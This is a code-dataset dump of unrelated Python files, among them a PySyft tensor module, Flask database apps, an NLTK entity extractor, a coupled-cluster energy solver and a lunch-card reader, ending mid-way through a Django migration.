algorithm(instance):\n if not os.path.exists(\"results/132302/a1/\" + sys.argv[1] + \"/\"):\n os.makedirs(\"results/132302/a1/\" + sys.argv[1] + \"/\")\n inputF = \"instances/\"+ sys.argv[1] + \"/\" + str(instance) + \".txt\"\n tasks_list, n = get_data(inputF)\n tasks_list = sort(tasks_list)\n tasks, latency = solution(tasks_list)\n save_results(tasks, latency, n)\n #return latency\n\ndef main():\n algorithm(int(sys.argv[2]))\n\nif __name__ == '__main__':\n main()\n","sub_path":"algorithms/132302/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571291381","text":"# future\nfrom __future__ import annotations\n\n# stdlib\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Type\nimport uuid\n\n# third party\nfrom nacl.signing import VerifyKey\nfrom numpy.typing import ArrayLike\n\n# relative\nfrom ..adp.vm_private_scalar_manager import VirtualMachinePrivateScalarManager\nfrom .manager import TensorChainManager\nfrom .passthrough import PassthroughTensor # type: ignore\nfrom .passthrough import is_acceptable_simple_type # type: ignore\n\n_SingleEntityPhiTensorRef = None\n\n\ndef _SingleEntityPhiTensor() -> Type[PassthroughTensor]:\n global _SingleEntityPhiTensorRef\n if _SingleEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.single_entity_phi import SingleEntityPhiTensor\n\n _SingleEntityPhiTensorRef = SingleEntityPhiTensor\n return _SingleEntityPhiTensorRef\n\n\n_RowEntityPhiTensorRef = None\n\n\ndef _RowEntityPhiTensor() -> Type[PassthroughTensor]:\n global _RowEntityPhiTensorRef\n if _RowEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.row_entity_phi import RowEntityPhiTensor\n\n _RowEntityPhiTensorRef = RowEntityPhiTensor\n return _RowEntityPhiTensorRef\n\n\n_AutogradTensorRef = None\n\n\ndef _AutogradTensor() -> Type[PassthroughTensor]:\n global _AutogradTensorRef\n if _AutogradTensorRef is None:\n # relative\n # relative\n from .autograd.tensor import AutogradTensor\n\n _AutogradTensorRef = AutogradTensor\n return _AutogradTensorRef\n\n\nclass AutogradTensorAncestor(TensorChainManager):\n \"\"\"Inherited by any class which might have or like to have AutogradTensor in its chain\n of .child objects\"\"\"\n\n @property\n def grad(self): # type: ignore\n child_gradient = self.child.grad\n if child_gradient is None:\n return None\n return self.__class__(child_gradient)\n\n @property\n def requires_grad(self) -> bool:\n return self.child.requires_grad\n\n def backward(self, grad=None): # type: ignore\n\n AutogradTensor = _AutogradTensor()\n\n # TODO: @Madhava question, if autograd(requires_grad=True) is not set\n # we still end up in here from AutogradTensorAncestor but child.backward\n # has no backprop_id\n if isinstance(self.child, AutogradTensorAncestor) or isinstance(\n self.child, AutogradTensor\n ):\n\n if grad is not None and not is_acceptable_simple_type(grad):\n grad = grad.child\n\n return self.child.backward(grad, backprop_id=uuid.uuid4()) # type: ignore\n else:\n raise Exception(\n \"No AutogradTensor found in chain, but backward() method called.\"\n )\n\n def autograd(self, requires_grad: bool = True) -> AutogradTensorAncestor:\n AutogradTensor = _AutogradTensor()\n\n self.push_abstraction_top(AutogradTensor, requires_grad=requires_grad) # type: ignore\n\n return self\n\n\nclass PhiTensorAncestor(TensorChainManager):\n \"\"\"Inherited by any class 
which might have or like to have SingleEntityPhiTensor in its chain\n    of .child objects\"\"\"\n\n    def __init__(self, child: Any) -> None:\n        self.child = child\n\n    @property\n    def shape(self) -> List[int]:\n        return self.child.shape\n\n    @property\n    def min_vals(self):  # type: ignore\n        return self.__class__(self.child.min_vals)\n\n    @property\n    def max_vals(self):  # type: ignore\n        return self.__class__(self.child.max_vals)\n\n    @property\n    def gamma(self):  # type: ignore\n        return self.__class__(self.child.gamma)\n\n    def publish(self, acc: Any, sigma: float, user_key: VerifyKey) -> PhiTensorAncestor:\n        return self.__class__(\n            self.child.publish(acc=acc, sigma=sigma, user_key=user_key)\n        )\n\n    def private(\n        self,\n        min_val: ArrayLike,\n        max_val: ArrayLike,\n        scalar_manager: VirtualMachinePrivateScalarManager = VirtualMachinePrivateScalarManager(),\n        entities: Optional[List] = None,\n        entity: Optional[Dict[str, Any]] = None,\n    ) -> PhiTensorAncestor:\n        \"\"\" \"\"\"\n\n        if entity is not None:\n            # if there's only one entity - push a SingleEntityPhiTensor\n\n            if isinstance(min_val, (float, int)):\n                min_vals = (self.child * 0) + min_val\n            else:\n                raise Exception(\n                    \"min_val should be a float, got \" + str(type(min_val)) + \" instead.\"\n                )\n\n            if isinstance(max_val, (float, int)):\n                max_vals = (self.child * 0) + max_val\n            else:\n                raise Exception(\n                    \"max_val should be a float, got \" + str(type(max_val)) + \" instead.\"\n                )\n\n            self.push_abstraction_top(\n                _SingleEntityPhiTensor(),\n                entity=entity,\n                min_vals=min_vals,\n                max_vals=max_vals,\n                scalar_manager=scalar_manager,  # type: ignore\n            )\n\n        # if there's row-level entities - push a RowEntityPhiTensor\n        elif entities is not None and len(entities) == self.shape[0]:\n\n            class_type = _SingleEntityPhiTensor()\n\n            new_list = list()\n            for i, entity in enumerate(entities):\n\n                if isinstance(min_val, (float, int)):\n                    min_vals = (self.child[i : i + 1] * 0) + min_val  # noqa: E203\n                else:\n                    raise Exception(\n                        \"min_val should be a float, got \"\n                        + str(type(min_val))\n                        + \" instead.\"\n                    )\n\n                if isinstance(max_val, (float, int)):\n                    max_vals = (self.child[i : i + 1] * 0) + max_val  # noqa: E203\n                else:\n                    raise Exception(\n                        \"max_val should be a float, got \"\n                        + str(type(max_val))\n                        + \" instead.\"\n                    )\n\n                value = self.child[i : i + 1]  # noqa: E203\n\n                new_list.append(\n                    class_type(\n                        child=value,\n                        entity=entity,\n                        min_vals=min_vals,\n                        max_vals=max_vals,\n                        scalar_manager=scalar_manager,\n                    )\n                )\n\n            self.replace_abstraction_top(_RowEntityPhiTensor(), rows=new_list)  # type: ignore\n\n        # TODO: if there's element-level entities - push all elements with PhiScalars\n        else:\n\n            raise Exception(\n                \"If you're passing in multiple entities, please pass in one entity per row.\"\n            )\n\n        return self\n","sub_path":"packages/syft/src/syft/core/tensor/ancestors.py","file_name":"ancestors.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233988140","text":"import pymysql\r\n\r\ndef db_connect():\r\n    # open the database connection\r\n    db = pymysql.connect(host='localhost', user='root', passwd=\"\", db='district_pinyin')\r\n    # create a cursor object with the cursor() method\r\n    cursor = db.cursor()\r\n    return (db, cursor)\r\n\r\n\r\ndef init_provinces():\r\n    db = db_connect()[0]\r\n    cursor = db_connect()[1]\r\n    # run the SQL query with the execute() method\r\n    province_sql = \"SELECT id, shortname, pinyin FROM district_pinyin.china_district_pinyin where level=1; \"\r\n    try:\r\n        # execute the SQL statement\r\n        cursor.execute(province_sql)\r\n        # 
fetch all records as a list\r\n        results = cursor.fetchall()\r\n        return results\r\n    except:\r\n        print(\"Error: unable to fetch data\")\r\n    finally:\r\n        db.close()\r\n\r\n\r\ndef init_cities():\r\n    db = db_connect()[0]\r\n    cursor = db_connect()[1]\r\n    # run the SQL query with the execute() method\r\n    city_sql = \"SELECT pid, shortname, pinyin FROM district_pinyin.china_district_pinyin where level=2; \"\r\n    try:\r\n        # execute the SQL statement\r\n        cursor.execute(city_sql)\r\n        # fetch all records as a list\r\n        results = cursor.fetchall()\r\n        return results\r\n    except:\r\n        print(\"Error: unable to fetch data\")\r\n    finally:\r\n        db.close()\r\n\r\n\r\n\r\n\r\n","sub_path":"mysqlCon.py","file_name":"mysqlCon.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600956483","text":"#!/usr/bin/env python3\nimport sys, os, pickle, time, random\n#from functools import reduce\n#from functools import partial\n#import tkinter # tk-devel tcl-devel are the packages the tkinter module depends on\n#import sqlite3 # sqlite-devel sqlite # packages the sqlite3 module depends on \n\n\"MoBan ------------ instruction\"\nprint('\\033[31;47;1m__name__ is %s\\033[0m' % __name__)\n\ndate = time.strftime('%Y年*%m月*%d日 %H时:%M分:%S秒',time.localtime())\n\ndef loop():\n    endlist = []\n    for i in range(1,5):\n        endlist.append(i)\n        time.sleep(0.1)\n        print(date)\n    return endlist # returns a list\n\n\ndef timetest(functionx):\n    start = time.time()\n    result = functionx() # result receives a list (when functionx = loop)\n    return time.time() - start, result # returns a tuple\n\n\n# decorate: to adorn; to arrange\ndef decorate(func):\n\n    def timetit(): # the inner function timetit() does the same job as timetest(functionx)\n        start = time.time()\n        result = func() # result receives a list (when func = loop)\n        return time.time() -start, result # returns a tuple\n    return timetit\n\n\n@decorate # the @decorate decorator is equivalent to loop_2 = decorate(loop_2)\ndef loop_2():\n    endlist = []\n    for i in range(1,5):\n        endlist.append(i)\n        time.sleep(0.1)\n        print(date)\n    return endlist # returns a list\n\n\n\n\nif __name__ == '__main__':\n    print('\\033[30;43;1m sys.argv is %s\\033[0m\\n' % sys.argv)\n\n    received = timetest(loop)\n    #2019年*04月*09日 19时:25分:58秒 \n    print(type(received),received,sep= ' ---',end = ' --timetest(loop)\\n\\n')\n    # ---(0.4012415409088135, [1, 2, 3, 4]) --timetest(loop) \n\n\n    received_2 = loop()\n    #2019年*04月*09日 19时:25分:58秒\n    print(type(received_2),received_2,sep= ' $$ ',end = ' --loop()\\n\\n')\n    # $$ [1, 2, 3, 4] --loop()\n\n\n    loop = decorate(loop) # returns the inner function timetit()\n    # calling timetit() returns a tuple\n    # same effect as calling timetest(loop) directly, which returns a tuple\n    received_3 = loop()\n    #2019年*04月*09日 19时:25分:58秒\n    print(type(received_3),received_3,sep= ' *** ',end = ' --decorate(loop)\\n\\n')\n    # *** (0.4016764163970947, [1, 2, 3, 4]) --decorate(loop)\n\n    \n    # the original function is not modified, but its behavior is extended; others can still call it the usual way\n    received_4 = loop_2() # the original function is unchanged\n    #2019年*04月*09日 19时:25分:58秒\n    print(type(received_4),received_4,sep= ' ### ',end = ' --loop_2()\\n')\n    # ### (0.40166783332824707, [1, 2, 3, 4]) --loop_2()\n\n\n\n\n","sub_path":"pythonScripts/day06/looptime.py","file_name":"looptime.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526861968","text":"# -*- coding: utf-8 -*-\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.getOrCreate()\nfrom pyspark.sql.types import *\nimport os,re\nimport time\nimport matplotlib.pyplot as plt \n\npath = \"./data/données/\"\nr=\".csv$\"\nfor f in os.listdir(path):\n    pathname = os.path.join(path, f)\n    s=pathname.split('/')\n    name=s[len(s)-1]\n    
print(name)\n    if (re.search(r,pathname)):\n        df = spark.read.format('csv').options(header=True, inferSchema=True).load(pathname)\n        # # compute the average age\n        df.agg({\"age\" : \"mean\"}).show()\n        # percentage comparison of young vs old\n        df.describe(['age']).show()\n        # compute the percentage of employees over 30\n        nb=df.filter(\"age > 30\").select(['age']).count()\n        cpt=df.count()\n        pour=nb/cpt\n        pour*100\n\n        # compare the number of men vs women\n        res=df.groupBy('sex').count()\n        # res.repartition(1).write.csv(\"./data/result/sex\"+name)\n\n        # the week with the most abolished positions\n        df.createOrReplaceTempView(\"data_table\")\n        # abolished=spark.sql(\"SELECT count(*) as jobEstablished FROM data_table where joblost='position_abolished'\")\n        # abolished.repartition(1).write.csv(\"./data/result/abolished_\"+name)\n","sub_path":"spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56501096","text":"# ---------------------------------------------------------------------------- #\n#\n# ---------------------------------------------------------------------------- #\n\nimport maya.OpenMaya as om\nimport maya.cmds as cmds\n\nimport config\n\ndef _reload():\n    reload(config)\n\n# ---------------------------------------------------------------------------- #\n\ndef getMeshFn(meshName):\n    cmds.select(meshName, replace = True)\n\n    list = om.MSelectionList()\n    om.MGlobal_getActiveSelectionList(list)\n    obj = om.MObject()\n    dpath = om.MDagPath()\n    list.getDagPath(0, dpath, obj)\n    meshFn = om.MFnMesh(dpath)\n    \n    return meshFn\n\ndef resetMesh(meshFn, cache):\n    setVertices(meshFn, cache)\n\ndef getVertices(meshFn):\n    vts = om.MPointArray()\n    meshFn.getPoints(vts)\n    return vts\n\ndef setVertices(meshFn, vts):\n    meshFn.setPoints(vts)\n    \ndef applyPose(meshFn, cache, weights, aRI, bRI, aCM, bCM):\n    arr = om.MPointArray()\n\n    for i in range(0, cache.length()):\n        w1, w2 = weights[i]\n        p = om.MPoint(cache[i])\n        \n        p1 = p * (aCM * aRI)\n        p2 = p * (bCM * bRI)\n        pNew = om.MPoint(om.MVector(p1 * w1) + om.MVector(p2 * w2))\n        \n        if config.verbose > 0:\n            print (\"Updated vertex for mesh.\" + \n                   \"\\nWas - %2.2f, %2.2f, %2.2f\" % (p.x, p.y, p.z) +\n                   \"\\nNow - %2.2f, %2.2f, %2.2f\" % (pNew.x, pNew.y, pNew.z))\n        arr.append(pNew)\n    setVertices(meshFn, arr)","sub_path":"SSD/MeshProcessing.py","file_name":"MeshProcessing.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441291419","text":"\"\"\"This module contains a Rod class for Tower of Hanoi game.\"\"\"\nfrom __future__ import annotations\nfrom typing import Optional, Tuple\n\nfrom stack_with_singly_linked_list import Stack\nfrom tower_of_hanoi.disk import Disk\n\n\nclass Rod(Stack):\n    members_dictionary = {}\n\n    def __init__(\n            self,\n            name: str,\n            first_element: Optional[Disk] = None) -> None:\n        \"\"\"Creates a Rod class object.\n\n        Rod is based on a stack Data Structure. If first_element argument is\n        provided, a Rod already containing 1 element (a Disk) is created.\n\n        Every time a Rod object is created it is also added to a class\n        attribute, a members_dictionary, through which a user can access all\n        the rods by specifying their name as a key. 
In Tower of Hanoi game\n there are always 3 rods with the following names: 'left', 'central',\n 'right'.\n \"\"\"\n super().__init__(first_element)\n self.__name = name\n self.__add_self_to_members_dictionary()\n\n def __add_self_to_members_dictionary(self) -> None:\n \"\"\"Adds the given instance of a Rod class to the class attribute\n dictionary. Key is the name of the Rod, value is the Rod itself.\"\"\"\n Rod.members_dictionary[self.name] = self\n\n @property\n def name(self) -> str:\n return self.__name\n\n def push_disk_on_top(self, disk: Disk) -> bool:\n \"\"\"Tries to push a given disk at the top of the Rod Disks Stack.\n\n If successful, returns True. Else, returns False.\"\"\"\n current_top_disk = self.peek_element_from_top()\n\n if disk.check_if_target_disk_below_exists_and_is_bigger(current_top_disk):\n self.push_element_on_top(disk)\n return True\n\n return False\n","sub_path":"PythonCode/tower_of_hanoi/rod.py","file_name":"rod.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"458978400","text":"import nltk\nimport wikipedia\nfrom string import punctuation\nfrom collections import Counter\nfrom nltk.corpus import stopwords\nfrom os import path\nfrom operator import itemgetter\n\ntext = None\nwith open('text.txt', 'r') as f:\n text = f.read()\n\ndef extractEntities(ne_chunked):\n data = {}\n for entity in ne_chunked:\n if isinstance(entity, nltk.tree.Tree):\n text = \" \".join([word for word, tag in entity.leaves()])\n ent = entity.label()\n data[text] = ent\n else:\n continue\n return data\n\ndef extractDescription(ne_chunked):\n entities = []\n for entity in ne_chunked:\n if isinstance(entity, nltk.tree.Tree):\n text = \" \".join([word for word, tag in entity.leaves()])\n entities.append(text)\n else:\n continue\n return entities\n\ndef getNeChunkEntities(tagged):\n chunked = nltk.ne_chunk(tagged)\n extracted = extractEntities(chunked)\n asList = list(extracted.keys())\n return asList\n\ndef getCustomEntities(tagged):\n entity = []\n entities = []\n for entry in tagged:\n if (entry[1].startswith(\"NN\") or (entity and entry[1].startswith(\"IN\"))):\n entity.append(entry)\n else:\n if (entity and entity[-1][1].startswith(\"IN\")):\n entity.pop()\n if (entity and \" \".join(e[0] for e in entity)[0].isupper()):\n entities.append(\" \".join(e[0] for e in entity))\n entity = []\n return entities\n\ndef getWikiDescription(entity):\n summary = wikipedia.page(entity).summary\n firstSentence = nltk.sent_tokenize(summary)[0]\n tokens = nltk.word_tokenize(firstSentence)\n nopunc = [token for token in tokens if token not in punctuation]\n tagged = nltk.pos_tag(nopunc)\n grammar = \"VBZ: {
    ?*}\"\n cp = nltk.RegexpParser(grammar)\n chunked = cp.parse(tagged)\n desc = \" \".join(extractDescription(chunked)).strip()\n return desc\n\ndef getWikiClassification(chunked):\n results = {}\n\n for entity in neChunkedEntities:\n if hasattr(results, entity):\n continue\n try:\n results[entity] = getWikiDescription(entity)\n if len(results[entity]) == 0:\n results[entity] = \"Thing\"\n except:\n results[entity] = \"Thing\"\n return results\n\ntokens = nltk.word_tokenize(text)\nnopunc = [token for token in tokens if token not in punctuation]\ntagged = nltk.pos_tag(nopunc)\n\nneChunkedEntities = list(set(getNeChunkEntities(tagged)))\ncustomEntities = list(set(getCustomEntities(tagged)))\nneChunkedClassification = getWikiClassification(neChunkedEntities)\ncustomEntitiesClassification = getWikiClassification(customEntities)\n\nprint(extractEntities(nltk.ne_chunk(tagged)))\nprint(neChunkedClassification)\nprint(customEntitiesClassification)\n","sub_path":"hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131572490","text":"from flask import Flask, render_template, redirect, url_for, request, flash\nfrom flask_sqlalchemy import SQLAlchemy\nimport pymysql\nfrom flask_migrate import Migrate # importing our latest dependency\nfrom dotenv import load_dotenv\nimport os\n\napp = Flask(__name__)\nload_dotenv()\n\nSQL_DIALECT_DRIVER = os.getenv(\"SQL_DIALECT_DRIVER\")\nSQL_U_NAME = os.getenv(\"SQL_U_NAME\")\nSQL_U_PASSWORD = os.getenv(\"SQL_U_PASSWORD\")\n#SQL_DB_ACCESS_INSTANCE_NAME_PORT = os.getenv(\"SQL_DB_ACCESS_INSTANCE_NAME_PORT\")\nSQL_DB_NAME = os.getenv(\"SQL_DB_NAME\")\nSECRET_KEY = os.getenv(\"SECRET_KEY\")\n\napp.secret_key = f\"{SECRET_KEY}\"\n\napp.config['SQLALCHEMY_DATABASE_URI'] = f\"{SQL_DIALECT_DRIVER}://{SQL_U_NAME}:{SQL_U_PASSWORD}@mysql/{SQL_DB_NAME}\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']= False\n\ndb = SQLAlchemy(app)\nMigrate(app, db) \n\nclass Data(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100))\n age = db.Column(db.Integer)\n emailID = db.Column(db.String(100))\n department = db.Column(db.String(100))\n\n def __init__(self, name, age, emailID, department):\n self.name = name\n self.age = age\n self.emailID = emailID\n self.department = department\n\n@app.route('/')\ndef Index():\n all_data = Data.query.all()\n return render_template('index.html', people = all_data)\n\n@app.route('/insert', methods=['POST'])\ndef Insert():\n if request.method == 'POST':\n name = request.form['name']\n age = request.form['age']\n email = request.form['emailID']\n department = request.form['department']\n \n actualData = Data(name, age, email, department)\n db.session.add(actualData)\n db.session.commit()\n\n flash('Data Entered Successfully')\n return redirect(url_for('Index'))\n\n@app.route('/update', methods=['GET', 'POST'])\ndef update():\n if request.method == 'POST':\n my_data = Data.query.get(request.form.get('id'))\n my_data.name = request.form['name']\n my_data.age = request.form['age']\n my_data.emailID = request.form['emailID']\n my_data.department = request.form['department']\n \n db.session.commit()\n \n flash('Data Updated Successfully!!!')\n return(redirect(url_for('Index')))\n\n@app.route('/delete//', methods=['GET', 'POST'])\ndef delete(id):\n my_data = Data.query.get(id)\n print(my_data)\n db.session.delete(my_data)\n db.session.commit()\n\n flash('Employee Data deleted Successfully')\n return 
redirect(url_for('Index'))\n\n\nif __name__ == \"__main__\":\n db.create_all()\n app.run(host=\"0.0.0.0\", debug=True)\n ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427559589","text":"q_tuple = (1,2,3,4,5,6,1,123,\"A\", \"b\", \"asdasd'\", 1 , 2.5 ,3, 4, -200, 300, \"1\")\r\n\r\nsumm = 0\r\ncount = 0\r\nmessage = ''\r\nfor i in q_tuple:\r\n if type(i) == int or type(i) == float:\r\n count += 1\r\n summ += i\r\n elif type(i) == str:\r\n message += i\r\nprint(summ / count)\r\nprint(message)","sub_path":"Lec_14_22.12/task10.py","file_name":"task10.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344044723","text":"import psi4.core\nimport numpy as np\n\n# get global options\nMAXITER = psi4.core.get_global_option('MAXITER')\nE_CONV = psi4.core.get_global_option('E_CONVERGENCE')\n\nclass CCD(object):\n\n def __init__(self, uhf):\n G = uhf.g # antisymmetrized AO-basis TEIs, \n C = uhf.C # MO coefficients\n self.e = uhf.e # orbital energies\n self.nocc = uhf.nocc # number of occupied spin-orbitals\n self.norb = uhf.norb # total number of spin-orbitals = 2 * number of basis functions\n self.nvir = uhf.norb - uhf.nocc # number of virtual spin-orbitals\n\n # transform integrals to MO basis\n mul = lambda T, M : np.tensordot(T, M, axes=(0,0))\n self.g = mul(mul(mul(mul(G, C), C), C), C)\n\n self.E = 0.0\n\n def compute_energy(self):\n nocc, nvir, e, g = self.nocc, self.nvir, self.e, self.g\n t = np.zeros((nocc, nocc, nvir, nvir))\n o = slice(None, nocc)\n v = slice(nocc, None)\n x = np.newaxis\n Ep = 1./(e[o,x,x,x] + e[x,o,x,x] - e[x,x,v,x] - e[x,x,x,v])\n\n for i in range(MAXITER):\n # isolate terms with P() factors as intermediates\n w1 = +1. * np.einsum(\"akic,jkbc->ijab\", g[v,o,o,v], t)\n w2 = -1./2 * np.einsum(\"klcd,ijac,klbd->ijab\", g[o,o,v,v], t, t)\n w3 = -1./2 * np.einsum(\"klcd,ikab,jlcd->ijab\", g[o,o,v,v], t, t)\n w4 = +1. 
* np.einsum(\"klcd,ikac,jlbd->ijab\", g[o,o,v,v], t, t)\n # update T2 amplitudes\n t = g[o,o,v,v] \\\n + 1./2 * np.einsum(\"abcd,ijcd->ijab\", g[v,v,v,v], t) \\\n + 1./2 * np.einsum(\"klij,klab->ijab\", g[o,o,o,o], t) \\\n + w1.transpose((0,1,2,3)) - w1.transpose((0,1,3,2)) \\\n - w1.transpose((1,0,2,3)) + w1.transpose((1,0,3,2)) \\\n + w2.transpose((0,1,2,3)) - w2.transpose((0,1,3,2)) \\\n + w3.transpose((0,1,2,3)) - w3.transpose((1,0,2,3)) \\\n + 1./4 * np.einsum(\"klcd,ijcd,klab->ijab\", g[o,o,v,v], t, t) \\\n + w4.transpose((0,1,2,3)) - w4.transpose((1,0,2,3))\n t *= Ep\n # evaluate energy\n E = 1./4 * np.sum(g[o,o,v,v] * t)\n dE = E - self.E\n self.E, self.t = E, t\n print ('@CCD {:<3d} {:20.15f} {:20.15f}' .format(i, E, dE)) # print progress to terminal\n psi4.core.print_out('@CCD {:<3d} {:20.15f} {:20.15f}\\n'.format(i, E, dE)) # print progress to output\n if(np.fabs(dE) < E_CONV): break # quit if converged\n\n return self.E\n","sub_path":"8/avcopan/ccd.py","file_name":"ccd.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486315580","text":"#___________________________________IMPORTS____________________________________\nfrom flask import Flask, render_template\nfrom flask_socketio import SocketIO\nfrom time import localtime, time, sleep\nfrom playsound import playsound\nimport mysql.connector\nimport threading\nimport serial\nimport json\n\n#____________________________________INIT______________________________________\napp = Flask(__name__)\napp.config[\"secret_key\"] = \"secret!\"\nsocketio = SocketIO(app)\n\nmydb = mysql.connector.connect(host=\"localhost\",\n user=\"root\",\n passwd=\"heslo\",\n db=\"obedy_test\")\ncursor = mydb.cursor()\n\nser = serial.Serial()\nser.baudrate = 9600\nser.port = 'COM4'\n\nschedule_check = 0\n\n#____________________________________FUNCIONS__________________________________\ndef get_lunch_amount():\n cursor.execute(\"SELECT COUNT(*) FROM OBEDY WHERE cislo_obedu=1 AND stav=1\")\n ones = cursor.fetchall()\n cursor.execute(\"SELECT COUNT(*) FROM OBEDY WHERE cislo_obedu=2 AND stav=1\")\n twos = cursor.fetchall()\n amount = {\"ones\":ones[0][0], \"twos\":twos[0][0]}\n return amount\n\ndef in_time(range, my_time):\n before = (range[0][0] > my_time[0]) or ((range[0][0] == my_time[0]) and (range[0][1] > my_time[1]))\n after = (range[1][0] < my_time[0]) or ((range[1][0] == my_time[0]) and (range[1][1] < my_time[1]))\n return not (before or after)\n\ndef what_day(num):\n days = (\"po\", \"ut\", \"st\", \"ct\", \"pa\", \"so\", \"ne\")\n if num > 4:\n return \"po\"\n return days[num]\n\ndef break_time(my_time, schedule_table):\n for lunchbreak in schedule_table[\"breaks\"]:\n if in_time(schedule_table[\"breaks\"][lunchbreak], my_time):\n return lunchbreak\n return False\n\ndef dispence_lunch(consumer, card_id, lunch_amount):\n print(\"Lunch dispenced\")\n cursor.execute(\"UPDATE OBEDY SET STAV=2 WHERE karta=%s\", (card_id,))\n if consumer[2] == 1:\n lunch_amount[\"ones\"] -= 1\n playsound(\"audio/one.wav\")\n elif consumer[2] == 2:\n lunch_amount[\"twos\"] -= 1\n playsound(\"audio/two.wav\")\n else:pass\n socketio.emit(\"update_amounts\", lunch_amount)\n\ndef check(consumer, card_id, lunch_amount):\n current_time = localtime(time())\n day = what_day(current_time.tm_wday)\n current_time = (current_time.tm_hour,current_time.tm_min)\n current_time = (12,25)\n print(current_time, day)\n\n with open(\"schedule.json\", \"r\") as json_data:\n schedule_table = 
json.load(json_data)\n\n miss_schedule = False\n if consumer[3] != 1:\n print(\"NO LUNCH\")\n playsound(\"audio/no.wav\")\n else:\n if schedule_check:\n print(\"checking schedule\")\n lunchbreak = break_time(current_time, schedule_table)\n if lunchbreak:\n if consumer[1] in schedule_table[day][lunchbreak]:\n print(\"On time\")\n dispence_lunch(consumer, card_id, lunch_amount)\n else:\n print(\"GET OUT\")\n playsound(\"audio/miss.wav\")\n miss_schedule = True\n else:\n print(\"Here you go\")\n dispence_lunch(consumer, card_id, lunch_amount)\n else:\n print(\"Here you go\")\n dispence_lunch(consumer, card_id, lunch_amount)\n\n print(\"sending consumer data\")\n socketio.emit(\"card_swipe\", {\"consumer\":consumer, \"card_id\":card_id, \"miss_schedule\":miss_schedule})\n\ndef card_swipe(card_id):\n cursor.execute(\"SELECT * FROM OBEDY WHERE karta=%s\", (card_id,))\n result = cursor.fetchall()\n print(result)\n if result:\n return (result[0][4], result[0][5], result[0][6], result[0][7])\n else: return False\n\n#___________________________________LOOP_______________________________________\ndef reader_loop(lunch_amount):\n ser.open()\n while 1:\n card_id = ser.readline().strip()\n card_id = str(card_id, 'utf-8')\n print(card_id)\n if card_id:\n consumer = card_swipe(card_id)\n print(consumer)\n if consumer:\n check(consumer, card_id, lunch_amount)\n else:\n print(\"invalid id\")\n\nlunch_amount = get_lunch_amount()\nthreading._start_new_thread(reader_loop, (lunch_amount, ))\n\n#___________________________________COMUNICATION_______________________________\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n return render_template(\"table.html\")\n\n@app.route(\"/rozvrhy\")\ndef interface():\n with open(\"schedule.json\", \"r\") as json_data:\n schedule_table = json.load(json_data)\n\n return render_template(\"rozvrhy.html\", schedule_table=schedule_table)\n\n@socketio.on(\"connected\")\ndef connector(data):\n print(data[\"data\"])\n socketio.emit('update_amounts', lunch_amount)\n\n@socketio.on(\"approved\")\ndef disspenced(data):\n print(\"deviant approoved\")\n dispence_lunch(data[\"consumer\"], data[\"card_id\"], lunch_amount)\n\n@socketio.on(\"switch_schedule\")\ndef switch_schedule(setting):\n global schedule_check\n schedule_check = setting\n print(\"schedule check: \", schedule_check)\n\n@socketio.on(\"schedule_change\")\ndef update_schedule(data):\n print(\"schedule updated\")\n with open(\"schedule.json\", \"w\") as json_data:\n json.dump(data[\"data\"], json_data)\n\n#___________________________________SERVER_START_______________________________\nif __name__ == \"__main__\":\n socketio.run(app)\n","sub_path":"app/obedy.py","file_name":"obedy.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72530005","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\nimport magazine.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Brand',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=30)),\n ('additional_information', models.TextField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, 
